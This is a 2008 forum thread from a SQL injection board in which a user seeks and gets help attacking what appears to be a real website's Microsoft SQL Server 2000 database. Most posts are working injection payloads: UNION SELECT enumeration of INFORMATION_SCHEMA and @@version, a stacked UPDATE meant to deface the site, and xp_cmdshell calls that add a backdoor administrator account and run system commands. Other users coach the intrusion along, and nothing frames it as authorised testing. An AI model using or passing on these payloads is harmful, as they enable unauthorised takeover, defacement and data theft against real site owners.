 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
SQL HELP |
 |
 Posted: Mon Apr 14, 2008 3:22 pm |
 |
|
| Snap |
| Active user |
 |
|
| Joined: Apr 14, 2008 |
| Posts: 25 |
|
|
|
 |
|
 |
|
I start with
NULL HAVING 1=1--
to get one colu
then i do
NULL GROUP BY *****,*****,****,***** HAVING 1=1--
and go and go until i have a valid page (the ***** represents colums)
then i do
NULL UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 FROM INFORMATION_SCHEMA.tables WHERE xtype='U'--
and that gives me a valid page, with all those numbers in differents fields
then i do
NULL UNION SELECT null,null,null,null,null,null,null,null,null,null,table_name,null,null,null,null FROM INFORMATION_SCHEMA.tables--
and i get, one field with "_DELETE_" value, what does it means ?
i do too
NULL UNION SELECT null,null,null,null,null,null,null,null,null,null,@@version,null,null,null,null FROM INFORMATION_SCHEMA.tables--
and i get,
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
***
I'm stuck here, what i need to do now to get admin of the DB or to change information or read sensitive data, etc ... ? Help me plz ! 
cheers ! |
|
|
|
|
|
|
|
|
| Posted: Mon Apr 14, 2008 6:47 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Try read "master..syslogins". Find out, if you have DBA privileges. If so, then you can get shell access to database server operating system.
Modifications - you can concatenate multiple sql queries in M$sql 2000.
So this will work: "22;UPDATE some_table SET title='Pwned!!';--"
What you need to know, is database's information schema - table names, columns, etc. This will show you where "good" information is located 
So you must interact with INFORMATION_SCHEMA |
|
|
|
|
|
|
|
|
| Posted: Mon Apr 14, 2008 7:10 pm |
|
|
| Oilik |
| Active user |
|
|
| Joined: Mar 05, 2008 |
| Posts: 35 |
|
|
|
|
|
|
|
| waraxe wrote: | Try read "master..syslogins". Find out, if you have DBA privileges. If so, then you can get shell access to database server operating system.
Modifications - you can concatenate multiple sql queries in M$sql 2000.
So this will work: "22;UPDATE some_table SET title='Pwned!!';--"
What you need to know, is database's information schema - table names, columns, etc. This will show you where "good" information is located
So you must interact with INFORMATION_SCHEMA |
yeah, but I don't like testing out to see if I have privileges when I'm doing that. I just jump straight to using xp..cmdshell. |
|
|
|
|
|
|
|
|
| Posted: Mon Apr 14, 2008 11:33 pm |
|
|
| Snap |
| Active user |
|
|
| Joined: Apr 14, 2008 |
| Posts: 25 |
|
|
|
|
|
|
|
| waraxe wrote: | Try read "master..syslogins". Find out, if you have DBA privileges. If so, then you can get shell access to database server operating system.
Modifications - you can concatenate multiple sql queries in M$sql 2000.
So this will work: "22;UPDATE some_table SET title='Pwned!!';--"
What you need to know, is database's information schema - table names, columns, etc. This will show you where "good" information is located
So you must interact with INFORMATION_SCHEMA |
Hey man many thx for your answer !
when i do
NULL UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM master..syslogins--
i get
Permits SELECT denied  for the column 'password', object 'syslogins', database 'master', owner 'dbo'.
/***.asp, line 18
what can i do now ?
thanks in advance  |
|
|
|
|
| Posted: Tue Apr 15, 2008 11:54 pm |
|
|
| Snap |
| Active user |
|
|
| Joined: Apr 14, 2008 |
| Posts: 25 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Wed Apr 16, 2008 10:39 am |
|
|
| Oilik |
| Active user |
|
|
| Joined: Mar 05, 2008 |
| Posts: 35 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Wed Apr 16, 2008 10:27 pm |
|
|
| Snap |
| Active user |
|
|
| Joined: Apr 14, 2008 |
| Posts: 25 |
|
|
|
|
|
|
|
i followed everything from that video
i did
null;exec master..xp_cmdshell 'net user guest 123456 /add';--
and i got a valid page !
then
null;exec master..xp_cmdshell 'net localgroup administrators guest /add';--
valid page too !
i was like WOW INCEDIBLE
then i opened the "Remote Dektop"
and here is the problem
WHERE /HOW DO I GET THE IP ? IS THE SAME OF THE PAGE ?
i entered the same ip of the page doing a resolve, and i got "cannot connect bla bla bla"
plus i think is a shared hosted ... plz help me
cheers ! |
|
|
|
|
|
|
|
|
| Posted: Wed Apr 16, 2008 10:52 pm |
|
|
| Oilik |
| Active user |
|
|
| Joined: Mar 05, 2008 |
| Posts: 35 |
|
|
|
|
|
|
|
| Snap wrote: | i followed everything from that video
i did
null;exec master..xp_cmdshell 'net user guest 123456 /add';--
and i got a valid page !
then
null;exec master..xp_cmdshell 'net localgroup administrators guest /add';--
valid page too !
i was like WOW INCEDIBLE
then i opened the "Remote Dektop"
and here is the problem
WHERE /HOW DO I GET THE IP ? IS THE SAME OF THE PAGE ?
i entered the same ip of the page doing a resolve, and i got "cannot connect bla bla bla"
plus i think is a shared hosted ... plz help me
cheers ! |
Well, you may not be able to do RDC, but you can execute other commands though. So try:
null;exec master..xp_cmdshell 'SYSTEMINFO';--
And see if that spits out anything. |
|
|
|
|
|
|
|
|
| Posted: Fri Apr 18, 2008 2:30 am |
|
|
| Snap |
| Active user |
|
|
| Joined: Apr 14, 2008 |
| Posts: 25 |
|
|
|
|
|
|
|
| Oilik wrote: |
Well, you may not be able to do RDC, but you can execute other commands though. So try:
null;exec master..xp_cmdshell 'SYSTEMINFO';--
And see if that spits out anything. |
i used
null;exec master..xp_cmdshell 'SYSTEMINFO';--
and i get a valid page with nothing in it ..  |
|
|
|
|
| Posted: Fri Apr 18, 2008 3:07 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
First you must be sure that shell access is working. Try this:
| Code: |
null;exec master..xp_cmdshell 'ping -n 20 localhost';--
|
If you can access shell, then delay > 20 seconds can be observed |
|
|
|
|
|
|
|
|
| Posted: Fri Apr 18, 2008 3:43 am |
|
|
| Snap |
| Active user |
|
|
| Joined: Apr 14, 2008 |
| Posts: 25 |
|
|
|
|
|
|
|
| waraxe wrote: | First you must be sure that shell access is working. Try this:
| Code: |
null;exec master..xp_cmdshell 'ping -n 20 localhost';--
|
If you can access shell, then delay > 20 seconds can be observed |
OMG ! waraxe you appeared again in my thread ,what an honor !!
I think i can't enter to the shell, because the ping delay doesn't work 
but, i HAVE to be able to do something with all this data, don't i ?
Server name = SVRPUBLICADOR
DB name = planet
user = backoffice_pm
version = Microsoft SQL Server 2000 - 8.00.2039
NULL UNION SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM master..syslogins--
Permits SELECT denied for the column 'password', object 'syslogins', database 'master', owner 'dbo'.
i can't do nothing with all that  how do i interact with INFORMATION_SCHEMA BTW, i am learning a lot thx !! |
|
|
|
|
|
|
|
|
| Posted: Sat Apr 19, 2008 9:51 am |
|
|
| Snap |
| Active user |
|
|
| Joined: Apr 14, 2008 |
| Posts: 25 |
|
|
|
|
|
|
|
Waraaaaaaaaaaaxe
bump !!!! |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 57
Members: 0
Total: 57
